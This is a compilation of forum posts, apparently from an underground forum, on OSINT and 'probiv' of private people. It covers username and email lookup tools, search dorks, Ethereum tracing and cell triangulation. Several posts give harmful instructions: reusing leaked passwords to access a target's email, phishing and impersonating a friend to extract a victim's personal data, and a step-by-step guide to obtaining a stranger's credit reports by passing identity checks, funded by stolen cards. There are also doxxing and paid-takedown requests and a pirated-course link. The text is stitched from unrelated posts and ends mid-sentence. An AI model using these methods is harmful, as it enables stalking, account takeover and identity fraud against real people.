Знаю, что одного скриншота замало, но всё же может кто знает
посоветуйте osint софты для линукса
Автор материала user17
источник Codeby.net
Перед началом любой работы стоит разобраться с тем, что мы будем делать. Давай я обрисую наш план в нескольких словах, чтобы ты мог сразу вычеркнуть то, что тебе уже известно и подчеркнуть важную или новую для себя тему. Так как мы рассматриваем возможность анализа пользователя по никнейму, то прежде всего давай попробуем провести такой тест при помощи специальных инструментов. В работе мы будем использовать Kali Linux , поэтому советую установить его перед началом. Также стоит проверить версию Python, она должна быть не ниже 3.10. Теперь можем переходить к нашей статье.
Как я рассказывал выше, сеть - это жизнь большинства людей. Зная прозвище человека мы можем узнать все социальные сети, в которых он зарегистрирован, соответственно лучше узнать его. Считай это некий способом дистанционного знакомства без контакта с человеком.
Также никнейм может использоваться в электронной почте. Далее поищем пароли из утекших баз и попробуем найти нужный. Так как не все люди предусмотрительны, то исходя из логической цепочки мы можем попробовать обойти защиту той же комбинацией символов и в случае успеха у нас будет окажется доступ к его электронной почте.
Теперь, чтобы попробовать себя в этом деле, нам потребуется определенный набор инструментов, который мы соберем ниже.
Достаточно неплохой инструмент для поиска по никнейму. Очень прост в установке. Поэтому для работы с ним нам потребуется ввести всего лишь одну команду.
Code:Copy to clipboard
pip3 install maigret
Чтобы использовать этот инструмент тебе требуется указать сам ник пользователя, а также флаг -a для вывода всей информации. На примере возьмем мой ник и попробуем найти его через maigret.
Code:Copy to clipboard
maigret user17 -a
Этого инструмента хватит за глаза для того, чтобы посмотреть все возможные социальные сети, где человек зарегистрирован под этим ником. Благодаря выводу базовой информации такой как фамилия или имя, можно сразу найти требуемые совпадения.
Также не менее интересный инструмент. Для его работы тебе потребуется Python, о котором я говорил в начале и пару секунд, чтобы напечатать все команды для установки. Делается все это через старый добрый pip. Он также использовался до этого.
Code:Copy to clipboard
pip3 install pipx
pipx ensurepath
pipx install ghunt
Первые две команды отвечают за установку требуемых модулей. Далее идет непосредственно сама загрузка утилиты на устройство. Самый неприятный минус в работе этого софта - это авторизация, которую к сожалению никак не обойдешь. Поэтому включаем фантазию и придумываем оригинальный никнейм для входа.
После этого тебе потребуется установить расширение для браузера. Я оставлю ссылки на дополнения для [Chrome](https://chrome.google.com/webstore/detail/ghunt- companion/dpdcofblfbmmnikcbmmiakkclocadjab) и Firefox. Далее переходим обратно в наш терминал и пишем следующую команду:
ghunt login
Здесь следует выбрать один из двух методов авторизации. Я отдаю предпочтение второму, поэтому покажу работу под него. Чтобы все работало корректно следуй следующему алгоритму:
Заходим в наше расширение для браузера и нажимаем кнопку Синхронизировать Ghunt
Далее следует войти в свой аккаунт Google (можно создать для этого фейк) и выбрать второй метод:
Далее возвращаемся в терминал и вставляем то, что мы скопировали в буфер обмена при помощи сочетания клавиш Ctrl+Shift+V.
Все готово! Мы настроили утилиту под наши нужды и теперь можем наконец-то ею воспользоваться. Для этого в терминале пишем следующее:
Code:Copy to clipboard
ghunt email почта_для_анализа
Проще говоря, можно написать следующим образом: ник@gmail.com. С некоторой вероятностью это может оказаться именно тот человек, которому принадлежит никнейм. Если быть точнее, то инструмент нам выдает такую информацию, как фамилия и имя аккаунта, а также сервисы, на которых зарегистрирована эта почта (Youtube, Photos, Maps, Calendar). Полученные данные можем сравнить с результатами инструмента Maigret. Если попадется канал YouTube, то по нему можно получить другой ник и совершить повторный анализ уже этого никнейма, тем самым получив ещё больше информации, через Google Maps и Photos лично мне мало что удавалось узнать, поэтому здесь не смогу подсказать, как полученная информация будет полезна (если она будет). Через календарь можно будет получить какие-либо заметки, в некоторых случаях может быть полезно. К примеру, там может храниться важная дата. Самое главное в том, что почту собственно тоже можно будет анализировать с помощью других инструментов, о которых мы поговорим уже в другой статье.
В современном мире даже обычный ник может выдать не мало информации о его владельце, особенно если везде он используется один и тот же, поэтому друзья, используйте разные никнеймы в социальных сетях, иначе информацию о вас будет слишком легко найти.
threat intelligence platforms
bgp.tools allows you to do bgp debugging and gives insight into internet routing with ease in a user friendly way
bgp.tools
UK-OSINT, open source intelligence, using the internet as an investigative tool, everything osint
www.uk-osint.net
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FSo6fTU-N97-H8yutJ_nn4f_jT9gh1xTvfj51BhBtoRbvQ63IMKh1XQWrc-4CfX- Vj-XCYva3oSgCdatpNQdGkR2UIVdbDZ- XKrTGl8TCX4oR5ouMGJIeX6EHHDQMz4pgc2hgr1UmvedcbDbLDRV1Vfxll6JKX1ga7JSwNVGN9B7pXzYDcYZl6Bv- vWSbyp-79c50BX7ZNsIMZGJRiR06mmmY_kJ_9n5zIE1HSFIoAqVQj0l4JxFiyKXCJIIwjJEXIXetdzDkRJ8Oq- VB2QtBhu8AzlCYGgx6p6SptUf9szlY48PTGFIXoXP- lua10so8cVdE8lfnHPg3NOxWszrP_A.jpg&hash=f7bbf65c4335840f085421522d2a7a99&return_error=1)
Monitoring and detection of threats that occur through the main channels used by threat actors linked to cyber crime. Law enforcement & legal removal: dlmcontact@proton.me 🔗@cvedetector 🔗@breachdetector 🔗@NewsDLM https://t.me/boost/breachdet
t.me
https://intelfetch.net (Paid)
https://zintel.cloud (Paid)
Доброго времени суток. Множетсво людей пользуются одними и теми же
инструментами, однако почему у кого-то удается найти человека, а у кого-то
нет?
Все дело в мышлении. Так называемое мышление осинтера вырабатывается у всех
спустя разное время, однако рано или поздно это наступает.
Что такое мышление осинтера?
Все просто. Это мышление при котором смотря на какую-либо часть информации у
тебя в голове уже появляется несколько сценариев того как этого человека можно
найти.
Пример:
Юзернейм.
Глядя на юзернейм можно достать много информации. Найти инициалы, или
имя/фамилию немного искаженную. Также в нике возможно найти год рождения
человека, отсылку на его любимое произведение или же любимого персонажа.
По нику можно найти аккаунты в других соц.сетях. Если найти вк/фейсбук/ок.. то
можно уже из странички достать кучу информации (фото, номер телефона, почту,
любимые книги, фильмы, цитаты, предпочтения в плане 18+ и т.д), сделать анализ
страниц в друзьях дабы найти город в котором вероятнее всего живет человек,
найти совместные фотографии, найти геометки этих фотографий...
Если если любимое произведение или же персонаж, то можно сделать левый аккаунт
стилизованный под это и скинуть фишинг ссылку, дальше уже от полученной
информации отталкиваться
Если есть искаженное имя или фамилия, то можно с левого аккаунта написать как
старый друг и назвать по имени, дальше человек уже сам пытаясь понять кто ты
будет выдавать больше личной информации, например в какое время и где был,
имена друзей и прочее...
Думаю на этом небольшом примере вам становиться ясно что это такое. Обладая подобным мышлением человек при желании имеет куда больше шансов найти информацию о жертве, в отличие от людей которые мыслят стандартно.
Стандартное мышление.
Стандартное мышление это мышление обычного человека который прочитал пару
гайдов и нашел инструменты. Он действует ограничено.
Пример:
Юзернейм.
Maigret, sherlock... блин, нет аккаунтов. Unamer, может он даст старые
аккаунты в тг... Тоже пусто... Видимо человек неплохо себя защитил и вся инфа
левая.
Возможно выглядит потешно, но именно так и выглядят начинающие осинтеры
которые думают что осинт это ввел пару символов в утилиту и бота в телеге и
вот вся информация.
Как выработать мышление осинтера?
В этом тебе поможет социальная инженерия дабы понимать как, а главное почему
действует человек. Ну и естественно тебе нужен опыт в использовании
инструментов. Взять те же sherlock и maigret. Куча сайтов которые они выдают
поломаны и при переходе у тебя будет ошибка. Со временем ты поймешь какие
сайты являются таковыми и будешь обращать взгляд только на то что работает.
Еще тебе поможет крайне простое правило: не все инструменты которые тебе дают
являются полезными. Огромное количество инструментов не имеет смысла ибо есть
другие инструменты у которых куда больший функционал, так еще и в конкретном
направлении куда больше возможностей.
Спасибо за прочтение.
Мне дали задание отследить шантажиста, если мне заплатят, я вспомню, кто помог
мне с биткойнами.
Я также ищу друзей для работы.
Где обсуждаются операции европола, интерпола? Может форум есть забугорный какой-нибудь где люди обсуждают операции подобные spector, Black gold и прочие
Есть человек, собрал информацию вплоть до адреса проживания
Причина сего действия: обманул близкого, никак не связан с xss и тому
подобные.
Что посоветуете еще сделать? Человек из Европы.
Deep Web :
free data leak search engine with plaintext password access
Привет.
Изучаю вопрос с утечками, и хотел бы узнать у более опытных ребят, где искать
подобные утечки (сайты, форумы, торренты, тг-каналы и т.д.).
Лайк за каждый дельный адрес
В этой статье рассмотрим способы изменения параметров поиска через специальные
операторы.
Специальные операторы, их ещё называют дорки, - можно вбивать как в сам
поисковик, так и в браузерную строку(параметр). Используя эту самую строку
возможно дополнительно менять индексацию.
Фильтруем результаты по времени в Google(доп.возможности)
Для этого сделаем любой запрос, зайдём в "инструменты"<<"время" и выберем
любое значение.
Теперь ищем в браузерной строке "qdr:*"
Если вы выбрали месячную выдачу - будет "gdr:m", если часовую - "qdr:h" и так
далее.
Однако сейчас мы поговорим о дополнительных значениях этого параметра :
"qdr:s" и "qdr:rltm" = секунды и настоящее время соответственно. Они позволяют
мониторить индексацию по запросам. В теории процесс можно автоматизировать с
помощью написания скрипта и использовать, к примеру для обнаружения
подозрительных сайтов или уведомления о новостях.
Теперь перейдём в картинки и снова "инструменты". Там мы можем выбирать
примерно нужный размер изображения. Но что если нужно задать конкретное
разрешение?Направляемся в строку браузера, находим isz:, вместо значения
параметра указываем точный размер(ширину:высоту), например 9500600, жмём
enter и получаем результат.
В расследованиях это мало пригодится, но незаменимый навык, например когда
нужно найти фон для видео или фотошопа.
В "Google", как и в "Яндекс" можно фильтровать лица в выдаче картинок. Для
этого, как обычно, заходим в инструменты и выбираем любой тип(рисунки)и ищем в
строке сверху параметр "itp". Теперь придаём ему значение "face". О важности
этой возможности говорить не стоит - дополнительный модуль для поиска лиц и
информации по ним.
Параметры применяются и к видео. Можно искать видео только на определённом
языке, для этого переходим в адресную строку и дописываем: &lang_filter=*.
Вместо звёздочки ставим обозначение языка(en, fr и т. п.).
Буду стараться ещё искать такие "секретики" и, конечно, сообщать вам.
Спасибо за внимание!
Ссылка для связи https://t.me/Digitalntelligence
Извините за неудобство, но разбито на несколько частей :
Ethereum (ETH) он же Эфириум (a.k.a. Эфир) - вторая по популярности
криптовалюта в мире, а также платформа для создания децентрализованных онлайн-
сервисов на базе блокчейна, работающего на основе умных контрактов (смарт-
контрактов).
Концепция второй криптовалюты была предложена ее создателем Виталиком Бутериным в конце 2013 года, а сеть была запущена 30 июля 2015 года. Но это дорогой читатель ты уже скорее всего знаешь и без меня
В данной статье мы рассмотрим простые методы и приемы исследования Ethereum, которые применяет в своей работе OSINT-специалист.
DISCLAIMER: Данная статья написана в ознакомительных целях и не является руководством к неправомерным действиям или обучающим материалом для сокрытия правонарушений.
Мы осознаем эффективность таких инструментов исследования криптовалют, как Chainalysis, CipherTrace, Elliptic и т.д. Однако, в наших статьях, мы всегда стараемся делать максимальный акцент на использование, доступных каждому, бесплатных источников данных.
Основным обозревателем блокчейна Ethereum является сервис Etherscan.
Ссылка: https://etherscan.io
Обязательно потратьте пару минут, чтобы зарегистрироваться на платформе,
поскольку это откроет вам расширенные возможности по получению данных о
транзакциях и криптокошельках Эфира.
Еще в 2020 году Etherscan запустил ИИ-систему внесения в черный список токенов и кошельков, ранее связанных с незаконными действиями.
В качестве альтернативных обозревателей можно порекомендовать:
Ссылка: https://blockchair.com/ru
Ссылка: https://tokenview.com
Все указанные выше обозреватели страдают одной и той же болезнью - отсутствием
встроенной системы визуализации транзакций Ethereum между криптовалюиными
кошельками. Как итог – приходится работать с табличной информацией.
Исправить это досадное недоразумение можно при помощи сервисов:
Ссылка: https://www.ethtective.com
GraphSense , но тут потребуется конкретно так потанцевать с бубном. Однако, если сможете достучаться до разработчиков, то есть возможность получить демо доступ к их облаку по модели SaaS.
Ссылка: https://graphsense.info, https://github.com/graphsense
Ну и конечно же Maltego CE с подключенным бесплатным модулем Tatum Blockchain Explorer, позволяющий исследовать транзакции таких криптовалют, как: Bitcoin, Ethereum, Litecoin, Bitcoin Cash и Dogecoin.
Ссылка: https://www.maltego.com
Переходим к идентификации криптокошельков Ethereum.
Официальными источниками данных о принадлежности того или иного кошелька являются обозреватель Etherscan, а также, основанный на его данных, визуализатор Ethtective.
Кроме официальных источников, для сбора данных о принадлежности кошельков
Эфириум, вы можете воспользоваться Google Dorks.
О том что такое эти ваши Google Дорки можно прочитать в статье Google Dorking или используем Гугл на максимум
Например, Dork [0xB3764761E297D6f121e79C32A65829Cd1dDb4D32 -block] позволяет очистить результаты поисковой выдачи, удаляя из нее ненужные публичные блокчейны.
Dork [site:etherscan.io 0xB3764761E297D6f121e79C32A65829Cd1dDb4D32] позволяет
искать информацию о криптокошельке на выбранной вебсайте.
Dork [site:https://docs.google.com/spreadsheets Bounty intext:"@gmail.com"] позволяет найти готовые базы данных идентифицированных криптокошельков Ethereum, используемых в различных программах BugBounty.
Кроме этого, существуют и различные пополняемые черные списки кошельков Ethereum, связанных с мошенническими действиями или совершением киберпреступлений.
В качестве примера, приведем список, расположенный на сайте Cryptoblacklist. Ссылка: https://www.cryptoblacklist.io/en/ethereum-blacklist. Данные с него можно выкачать для использования в собственных продуктах.
Еще одним интересным инструментом для исследования крипты является Breadcrumbs.app Ссылка: http://breadcrumbs.app. Инструмент, к сожалению, условно бесплатный, однако даже бесплатная версия по функционалу не уступит рассмотренному ранее Ethtective.
Breadcrumbs.app покажет принадлежность адреса к конкретной бирже, сервису или
скам-проекту. Показывает AML-характеристики всех входящих и исходящих
транзакций.
Вот и все на сегодня. Информации о методах и инструментах OSINT по криптовалюте Ethereum, к сожалению, не много. В этой статье мы постарались собрать для вас все что есть в свободном доступе. Если вы знаете дополнительно какие-либо интересные сервисы, приложения или методики OSINT по эфиру, то поделитесь в комментариях. Так получится собрать наиболее полный гайд по OSINT для Эфира.
Автор @TomHunter
**NExfil — OSINT-инструмент, предназначенный для поиска профилей по имени пользователя. Предоставленные имена проверяются более чем на 350 веб-сайтах в течение нескольких секунд.
Целью данной утилиты является быстрое получение результатов при минимальном количестве ложных срабатываний.
Установка:
$ git clonehttps://github.com/thewhiteh4t/nexfil.git
$ cd nexfil
$ pip3 install -r requirements.txt
Использование:
$ python3 nexfil.py -h**
Can anyone recommend me a good telegram channel search engine?
I tried several but they are very bad
**Недавно увлекся пробивом информации, не могли-бы вы помочь найти мне слив этого курса(поставлю лайк):https://www.udemy.com/course/russianosint/ .
Или найти другие курсы по этой тематике.
Заранее спасибо!**
Hello,
I used to manage sock puppet and at the time, getting fake followers was really easy. That account has 12K followers.
I want to shut it down, either suspension or anything really.
Just show me proof you can do it and I will pay.
Let me know the price for service.
Thanks
PM me here or reply with Telegram ID.
русские более чем приветствуются
websites like Pipl, truepeople search,family tree
Отключаем персонолизированный поиск
Небольшой дисклеймер: несмотря на то, что мы пользуемся способами работы с поисковиками с помощью публично документированных функций и ситуацией, что поисковые системы — зеркала интернета, которые индексируют публичную часть не запрещённую к индексации, данные которые вы можете найти могут быть “чувствительными” для других людей. За то, каким образом вы используете найденную информацию несёте ответственность только вы.
Необходимые настройки
В теории работы поисковых систем упоминалось про персонализированный поиск, который широко используется алгоритмами современных поисковых систем. Для того чтобы на нас это никак не влияло нам нужно правильно настроить свою рабочую среду и отключить персонализированный поиск.
В Google это делается так:
- Заходим в свой аккаунт
- Управление данными персонализации
- История приложений и веб-поиска
Необходимо передвинуть ползунок в активное положение, снять все галочки и
таким образом мы выключаем персонализированный поиск.
В Яндексе:
Мы должны зайти в управление работы работы поисковой системы Яндекс, это
делается переходом на ссылку https://yandex.ru/tune/search
Далее необходимо снять все галочки. И выставить “без ограничений” в “Фильтрации поиска”
Нажмите кнопку “сохранить”.
Также можно использовать вкладку работы браузера в режиме инкогнито, где cookies не сохраняются.
Вы можете использовать Google и Яндекс без персонализированного поиска, за исключением персонализации по ip адресу, который будет совпадать с предыдущими сессиями. Настройки по умолчанию не будут действовать в рамках текущей интернет сессии.
Также можно воспользоваться DuckDuckGo — сервисом, через который можно искать в том же Яндекс без отслеживаний, то есть будет поисковая выдача от яндекса, но не будут использоваться те алгоритмы яндекса, которые вас отслеживают и формируют для вас персонализированную выдачу.
Книга на английском. Для ознакомления. Была найдена в телеге. Если понравилась
книжка - не забудьте приобрести ее на амазоне.
Посвящена расследованию ФБР событий произошеших 6 января прошлого года в
здании Капитолия.
You must have at least 10 reaction(s) to view the content.
Информация о курсе:
Вторая часть курса «Зеркало Интернета. Поиск приватной информации. В поисках сокровищ» стоила 2000 рублей и включала в себя почти 400 видеофайлов. Общей продолжительностью часов в 6. Речь пойдет о использовании сервисов и альтернативных поисковиков для поиска не только текста, но и, например, медиа- контента, а также будем делать поиск неиндексированного контента.
Мы также учимся через практику, с теорией только в тех местах, где требуется объяснить определённые механизмы работы.
Цель второй части: расширить область поиска информации и, опять же, встроить новые инструменты в ежедневную практику в качестве навыка. Т.е. не научить искать что-то конкретное, а искать всё, задействуя при этом большее количество инструментов и их профессиональное использование.
Примерный план из 400 видеоуроков:
• Работа со всеми поисковиками (Google, Yahoo, Yandex, Bing, DuckDuckGo).
• Работа со всеми соц. сетями (Telegram, Vk, Twitter, Facebook, Одноклассники,
Instagram, Мой Мир).
• Поиск по тексту, видео, фото. Оптимизация, настройка поисковых запросов.
• Показан перечень + дальнейшая работа со сторонними сервисами по поиску
информации.
• Поиск по лицам.
• Поиск на определенных сайтах.
• Слежка за изменением/добавлением контента на сайтах.
• Получение информации о Google, Facebook, Vk, Twitter аккаунтах различными
способами.
• Поиск открытых директорий и контента в них.
• Поиск по файлообменникам.
• Проверка и поиск данных в слитых базах.
• Поиск по git-ресурсам, paste-ресурсам, облачным clipboard-сервисам, по коду.
• Получаем информацию о малоизвестных поисковиках.
• Дан целый перечень информации, которую можно найти через восстановление
пароля во всех популярных соц. сетях.
• Базовая информация по пробиву пользователей.
• Речь идет даже о поиске контента на stackoverflow. Большинство, если не
каждое видео закрепляется примерами. Поэтому понять что и как может любой
пользователь.
magnet:?xt=urn:btih:56432b1f43d0adfd440badc4de8c1f1a51dce4dd&dn=%5bopenssource.org%5d%20%d0%97ep%d0%ba%d0%b0%d0%bbo%20%d0%98%d0%bd%d1%82%d0%b5%d1%80%d0%bde%d1%82%d0%b0%202.zip&tr=http%3a%2f%2fbtP1.megaseed.kz%3a5858%2fannounce&tr=http%3a%2f%2fbtP2.megaseed.kz%3a5858%2fannounce&tr=http%3a%2f%2fbtP0.megaseed.kz%3a5858%2fannounce
Я работаю над созданием руководства для обмена здесь. Я хотел бы написать это, чтобы изложить концепции и методы (не придурки) - моя цель - поделиться некоторыми деталями, которые помогли бы использовать поисковые системы, такие как Google, если английский не является родным языком. Я также хотел бы помочь проинформировать носителей английского языка о том, как запросы searcb отправляются русскоязычными и как лучше всего использовать яндекс. Мы публикуем здесь в ascii и, возможно, некоторые примеры в Интернете.
Извините за любые ошибки при использовании программного обеспечения для перевода.
https://pimeyes.com/en (система поиска лиц с искусственным интеллектом)
https://osintframework.com/ (КЛАССИЧЕСКИЙ ФРЕЙМВОРК)
https://www.osinttechniques.com/osint-tools.html (веб-основа AIO OSINT)
https://www.spiderfoot.net/ (AIO OSINT)
https://start.me/p/L1rEYQ/osint4all (AIO OSINT)
https://github.com/Datalux/Osintgram (INSTAGRAM OSINT)
https://github.com/sundowndev/phoneinfoga (PHONE NUMBER OSINT)
https://www.maltego.com/ (МЫ ВСЕ ЭТО ЗНАЕМ)
================================English============================================================
================================English============================================================
https://pimeyes.com/en (AI Face Search Engine)
https://osintframework.com/ (A CLASSIC FRAMEWORK)
https://www.osinttechniques.com/osint-tools.html (web based AIO OSINT)
https://www.spiderfoot.net/ (AIO OSINT)
https://start.me/p/L1rEYQ/osint4all (AIO OSINT)
https://github.com/Datalux/Osintgram (INSTAGRAM OSINT)
https://github.com/sundowndev/phoneinfoga (PHONE NUMBER OSINT)
https://www.maltego.com/ (WE ALL KNOW THIS ONE)
Original Link: community.turgensec.com/shodan-pentesting- guide
Backup Link: archive.ph/8xOXJ
](https://start.me/p/b5Aow7/asint_collection)
A startpage with online resources about AsINT_Collection, created by Jk.
start.me
Хотел спросить у знающих пользователей, которые работали с телефонными номерами для получения подробнейшей информацией о номере. Откуда брать сведения(сайты, базы и т.п), есть ли статьи на этот счет (RU/US). Буду благодарен любой помощи. В планах свой бот в тг (Telegram), который ищет максимально подробные сведения (оператор, страна, город, ФИО, учетки соц. сетей, мессенджеров; последнее местоположение)
Hidden content for authorized users.
MOSINT is an OSINT Tool for emails. It helps you gather information about the target email.
![github.com](/proxy.php?image=https%3A%2F%2Frepository- images.githubusercontent.com%2F299054922%2Fa5ed4a5a-0ee1-469f-83f0-7ec11e6ec7b6&hash=d3f6b80f90d72f4ccbff9a7b9ee5b698&return_error=1)
](https://github.com/alpkeskin/mosint)
An automated e-mail OSINT tool. Contribute to alpkeskin/mosint development by creating an account on GitHub.
github.com
Verification Service {Check if email exist}
Check social accounts with Socialscan
Check data breaches
Find related emails [API & PDFs]
Find related phone numbers
Find related domains
Scan Pastebin Dumps
Google search
DNS Lookup
Вся информация предоставляется исключительно в ознакомительных целях.
_Добрый день друзья!Решил оставить данную статью для тех людей которые хотят
сэкономить копейку на пробиве инфы!Надеюсь будет полезно!В статье будет
изложен пробив Credit Repor от трёх контор:
Experian, Euqifax, TransUnion
Будут которы для пробива информации на работодателей,кредит репорт,наличие
автомобилей,и дл двух штатов!
Начинаем мы с пробива базовой информации которая поможет нам получить доступ к одному из Credit Report а именно TransUnion!
-Для начала мы идём на такой сервис как
https://www.peoplefinders.com/
Сервис Достаточно богат на такую информацию
(Адреса,родственники и знакомые,мобильные номера,и почты)
Премиум в сервисе можно получить с помощью отработки СС,влазит абсолютно все
что живое)
Имея адрес и имя фулки такого вида
John Barrat
3600 Stratford rd,California,90016
Ищем на сайте подходящего по адресу нам человека,это не трудно ,база большая в
90% случаев результат поиска положительный!
Как только нашли человека
Выписываем в текстовый документ первую собранную информацию
Это адреса ,телефоны,почты,родственники и знакомые
Аналоги Peoplefinders(instantcheckmate,pipl.com,truthfinder,mylife..)
С базовой информацией разобрались,идём далее..
Биржа TransUnion также может спросить нас,о том какого года наша модель
автомобиля!Узнать это для нас так же не проблема
Для этого существуют много страховых компаний разберём на примере таких
контор_
_-Geico
-Allstate
-Progressive
Вводим zip и нажимаем start quote
Для того что бы пробить информацию об автомобилях нужно заполнить минимум
информации (Адресс,имя фамилия,дата рождения) лично мой совет пробивать в
нескольких конторах так как порой в одной конторе высвечиваются не все
автомобили
Получаем информацию такого вида!
С автомобилями разобрались поехали дальше
Так же TransUnion может спросить у нас штат в котором зарегестрирован SSN
Для этого я оставлю вам список штатов SSN
000–003 New Hampshire
004–007 Maine
008–009 Vermont
010–034 Massachusetts
035–039 Rhode Island
040–049 Connecticut
050–134 New York
135–158 New Jersey
159–211 Pennsylvania
212–220 Maryland
221–222 Delaware
223–231 Virginia
232–236 West Virginia
237–246 North Carolina
247–251 South Carolina
252–260 Georgia
261–770 Florida
268–302 Ohio
303–317 Indiana
318–361 Illinois
362–386 Michigan
387–399 Wisconsin
400–407 Kentucky
408–415 Tennessee
416–424 Alabama
425–428 Mississippi
429–432 Arkansas
433–439 Louisiana
440–448 Oklahoma
449–467 Texas
468–477 Minnesota
478–485 Iowa
486–500 Missouri
501–502 North Dakota
503–504 South Dakota
505–508 Nebraska
509–515 Kansas
516–517 Montana
518–519 Idaho
520 Wyoming
521–524 Colorado
525 New Mexico
526–527 Arizona
528–529 Utah
530 Nevada
531–539 Washington
540–544 Oregon
545–573 California
574 Alaska
575–576 Hawaii
577–579 District of Columbia
580 Virgin Islands
581–584 Puerto Rico
585 New Mexico
586 Pacific Islands
587–588 Mississippi
589–595 Florida
596–599 Puerto Rico
600–601 Arizona
602–626 California
627–645 Texas
646–647 Utah
648–649 New Mexico
Впринцыпе с собранной информацией мы практически готовы для получения первого
кредитного отчёта!
Переходим на сайт
annualcreditreport.com
Переходим на вкладку Request yours now!
_Заполняем всю необходимую информацию
-Переходим дальше
-У нас будет выбор таких контор как
Experian, Euqifax, TransUnion
-Выбираем TransUnion(так как система задумана таким образом ,в TransUnion вы найдёте ответы на вопросы Euqifax в Euqifax найдёте ответы на Experian!
-Нажимаем продолжить
И попадаем на вкладку вопросы по BG
Думаю с ответами на данные вопросы имея информацию которую вы собрали вы
справитесь!!
Совет:Сделайте скриншот вопросов,так как если у вас не получится ответить с
первого раза,у вас есть ещё одна попытка,вопросы будут впринцыпе те же
самые,но ответы будут различные,методом исключения вы поймёте где была
допущена ошибка!
Если все хорошо мы получаем report в котором мы найдём увидем все
адреcса,работу,номера телефонов и credit report!
Выглядит он так..
Сохраняем PDF ,и перед переходом к получению следующего репорта изучаем внимательно!
Дальше возвращаемся на сайт
annualcreditreport.com
-Проделываем то же самое только в меню выбора
Нажимаем на Euqifax
Если на все вопросы дали правильные ответы
Получаете подробный report от этой компании
-С помощью которого вы сможете дать ответы на вопросы конторы Experian
Думаю тут все будет понятно!И проблем не возникнет
С кредитными ремонтами закончили..идём далее
-----------------------------------------------
С собранной информацией мы можем узнать credit score
-Для этого идём на сайт credit karma или ему подобные!регестрироемся вводим информацию отвечаем на бг,получаем credit score!
Или же идём на сайты компаний которые дают кредиты_
netcredit.com
cashnetusa.com
avant.com
_После простенькой регистрации вам на мыло( или прямо на сайте) упадет
уведомление, одобрили нам кредит или нет. И там же будет описано в красках
почему его дали (собственно выскоий CS) или почему не дали
С этим вроде бы разобрались!
---------------------------------------------
Далее работа. О ней мы тоже должны узнать. Точнее из отчетов которые сделали
выше, мы уже знаем. Но нужно больше)
Для некоторых занятий нам нужно пробить федиральный номер работадателя ( EIN
), ворк фоне, адрс. Как это сделать? Да очень просто.
feinsearch.com
Условно бесплатная контора на которой с одного аккаунта можно сделать 5 проверок. Но что нам когда то мешало делать много аккаунтов?
-------------------------------------------
Заострить ваше внимание я хочу на другом сайте:
http://www.guidestar.org
Такой же ресурс по пробиву работадателей, но подробность его зашкаливает) Главным достоинством его можно назвать то что вы можете лицезреть финансовую отчетность изучаемого места работы._
_Подключить логику и проблем у вас не возникнет с данными сервисами!
Ну теперь осталось пробить driver license (Fl,Tx)
В этом нам поможет сервис
publicdata.com/
Вбивается как и в случае peoplefinders любой отработкой ест все что живое!!
Там мы можем узнать номер лицензии и адрес
Как только узнали
Переходим на сайт
https://services.flhsmv.gov/DLCheck/
Это для Флориды
https://www.dps.texas.gov/DriverLicense/dlstatusCheck.htm
это Техас
И узнаем валидны ли ещё права и узнаем срок действия!_
Запускаем с помощью командной строки: python3 osintsan.py
Что предлагает новая версия OSINT-SAN Pro 3.0.
Видим меню с большим количеством разделов. Разберу их детально, выбрав объектом исследований Cloud4Y:
2) Комбайн пассивной разведки веб-инфраструктуры, позволяющий получить
всеобъемлющую информацию о веб-инфраструктуре компании.
Проверим, как работают некоторые функции. Например, сервис обнаружил
установленный CMS меньше чем за секунду.
Краулер высасывает данные сайта и сохраняет в нашем каталоге для исследования.
3) Карта DNS. Удобно, красиво. Очень информативное оформление. Не готов
демонстрировать ресурсы компании, а чужие уже противозаконно.
5) Заводим IP и получаем несколько источников геолокации. Получается пробив IP
на максималках.
7) Позволяет проверить IP адрес на прокси . Я проверил IP, за которым
скрывался некий хакер в одном из расследуемых мною инцидентов.
8) История доменного имени. Хороший вариант разведки в некоторых случаях.
Парсит все упоминания email на сайте на лету. Социальным инженерам, фишерам — раздолье.
Поиск информации о мобильных устройствах. Модуль ищет по БД. Слабоват, но думаю будет совершенствоваться
БД утечек email-паролей. Ввёл один знакомый email и получил информацию по утечкам в 10 сервисах. Модуль будет полезен при разборе инцидентов.
13) Анализирует по БД репутацию, выставленную почтовыми сервисами email’у.
Хороший сервис проверки мнимых контрагентов или других любителей социальной
инженерии по email.
15) Про Bigbro я уже рассказывал. В этот раз добавлены более совершенно
написанные фишинговые страницы для деанона по JS.
17 и 18) Поиск Метаданных, данных о данных. Если вы юный кулхацкер, можете попросить девушку прислать фотографию с её телефона. А затем удивить её тем, что будете знать всё о ее телефоне и месте съемки. 18 Пункт на основе ИИ распарсит сеть на похожих людей. Работает через онлайн-сервисы.
Сбор данных по одноименной сети zoomEye
Ещё один способ «найти по IP»
Деанон по Telegram. На скриншоте ниже — деанон «хакера» из группы «анонимус» (судя по его аватарке «Гая Фокса»). Куча данных, телефоны, смены ников, устройства… Вот вам еще один звонок, что невинно оставленное согласие на обработку «куков, данных, других согласий» может привести к полному деанону.
23) Библиотека по ОСИНТ ресурсам в сети:
24, 25) Поисковики с разумными алгоритмами. Ищут без рекламы и всякого лишнего
мусора, что удобнее обычного поисковика.
26) Вы ведь помните, что все транзакции в цепочках биткойн сохраняются
навсегда? Если установить ваш биткойн-кошелек, то можно видеть все ваши доходы
и расходы. Вот вам пример:
27) Розыск по авто, открывается сторонний веб-сервис.
Другие модули соответствуют названию и не требуют расшифровки.
i havn 't found any proper threads about this topic on the forum , so i decided to start one
Only thing i found in this forum about sim triangulation was : https://xss.is/threads/40896/post-254726
Насчет отслеживания местоположения, эта технология называется триангуляция. Лежит на основе функционирования мобильной связи, которая раньше в быту называлась сотовой. Сотовой, она называлась потому, что каждая базовая станция покрывающая определенный сектор называлась сотой, если проще CellID. Макросоты (до 35-70км), соты (5км), микросоты (1км) и фемтосоты (внутри помещений). Соты краями наслаиваются друг на друга для обеспечения так называемого бесшовного роуминга, когда при перемещении телефона связь не обрывается. За счет этих наслаиваний и определяется местоположение телефона как грубое, что он находится в квадрате несколько километров между несколькими сотами, так и более точное с помощью той самой триангуляции, накладывание мощности минимум трех БС может с довольно высокой точностью показать где находится устройство.
Теперь про звонки без сим карты. Данная возможность заложена в федеральном законе о связи, статья 52. Звонок передается к ближайшему оператору связи, звонок возможен на один единственный номер - 112 и при звонке передается только IMEI телефона.
Насчет передачи в выключенном режиме. Кнопка питания является далеко не первой
в цепочке питания устойства. Как минимум функционируют так нызваемые real time
clock, который позволяет например срабатывать будильнику даже если телефон
"выключен". Ответ на вопрос передается или нет служебная информация в этом
